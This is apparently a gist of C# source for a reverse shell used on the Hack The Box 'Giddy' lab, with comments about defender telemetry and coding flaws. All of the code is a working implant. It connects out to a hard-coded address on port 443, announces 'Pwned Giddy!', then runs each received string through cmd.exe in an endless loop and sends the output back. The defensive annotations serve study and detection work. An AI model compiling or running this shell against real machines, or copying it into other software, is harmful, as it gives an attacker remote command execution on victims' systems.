Created
February 6, 2019 09:47
Sample reverse shell code for HTB Giddy.
using System; | |
using System.Text; | |
using System.IO; | |
using System.Net; | |
using System.Net.Sockets; | |
using System.Diagnostics; | |
// Lab sample (HTB Giddy) of a reverse shell. The process dials out to a hard-coded
// address, reads text from the socket, runs each received string through cmd.exe and
// writes the captured output back over the same connection.
//
// Despite the name "Server", this class is the connecting side: it calls Connect and
// never binds, listens or accepts.
//
// What this code makes observable to a defender:
//   * an outbound TCP session to port 443 that carries plaintext UTF-8 (a raw Socket is
//     used, no TLS layer appears anywhere in this file), so the first bytes on the wire
//     are not a TLS handshake;
//   * one "cmd.exe /c ..." child process per received command, created with redirected
//     stdout/stderr, which shows up in process-creation telemetry (e.g. Security event
//     4688 with command-line auditing, or Sysmon event ID 1) under this binary as parent;
//   * the destination address and the greeting text are string literals in the binary.
class Server { | |
    // Entry point: connect out, send a greeting, then loop forever executing whatever
    // text arrives on the socket. `args` is not used.
    public static void Main(String[] args) { | |
        Socket s = null; | |
        // Hard-coded destination; a lab-range address in the original sample.
        String server = "10.10.12.75"; | |
        // Fixed 1024-byte receive buffer, reused for every read.
        byte[] res = new byte[1024]; | |
        // Greeting sent once after connecting; travels in cleartext.
        byte[] msg = Encoding.UTF8.GetBytes("Pwned Giddy!\n"); | |
        IPAddress me = IPAddress.Parse(server); | |
        IPEndPoint i = new IPEndPoint(me, 443); // Remote listener address and port (author's note: "Our IP and Port")
        // IPv4 stream socket; nothing wraps it in TLS even though the port is 443.
        s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); | |
        // No try/catch around Connect: a refused or unreachable destination surfaces as
        // an unhandled exception.
        s.Connect(i); | |
        if(s.Connected) { | |
            s.Send(msg, 0, msg.Length, SocketFlags.None); | |
        } | |
        // Command loop: no exit condition and no delay between iterations.
        while(true) { | |
            // Zero the buffer so bytes from a previous command do not leak into this one.
            Array.Clear(res, 0, res.Length); | |
            // Requests exactly the number of bytes currently pending (s.Available);
            // the return value (bytes actually read) is discarded.
            s.Receive(res, 0, s.Available, SocketFlags.None); | |
            // Decodes the whole 1024-byte buffer, not only the bytes just received.
            String cmd = (Encoding.UTF8.GetString(res)).Trim(); | |
            // Strip CR/LF so the text becomes a single command line.
            cmd = cmd.Replace("\r", string.Empty); | |
            cmd = cmd.Replace("\n", string.Empty); | |
            if(!string.IsNullOrEmpty(cmd)) { | |
                // Run the received text and return stdout+stderr to the remote end.
                byte[] output = Encoding.UTF8.GetBytes(getOutput(cmd)); | |
                s.Send(output, 0, output.Length, SocketFlags.None); | |
            } | |
        } | |
    } | |
    // Runs `cmd` through "cmd.exe /c" and returns everything the child wrote to stdout
    // followed by everything it wrote to stderr.
    //
    // The received text is concatenated into the command line unmodified, so the full
    // remote-supplied command appears verbatim in any process-creation log that records
    // command lines.
    public static String getOutput(String cmd) { | |
        var psi = new ProcessStartInfo { | |
            FileName = "cmd.exe", | |
            Arguments = "/c " + cmd, | |
            RedirectStandardOutput = true, | |
            RedirectStandardError = true, | |
            // Must be false for the stream redirection above to be allowed.
            UseShellExecute = false | |
        }; | |
        // Echoes the command line on the local console of this process.
        Console.WriteLine(psi.Arguments.Trim()); | |
        var p = Process.Start(psi); | |
        // stdout is drained to the end first, then stderr, then the exit is awaited.
        String res = p.StandardOutput.ReadToEnd(); | |
        res += p.StandardError.ReadToEnd(); | |
        p.WaitForExit(); | |
        return res; | |
    } | |
} |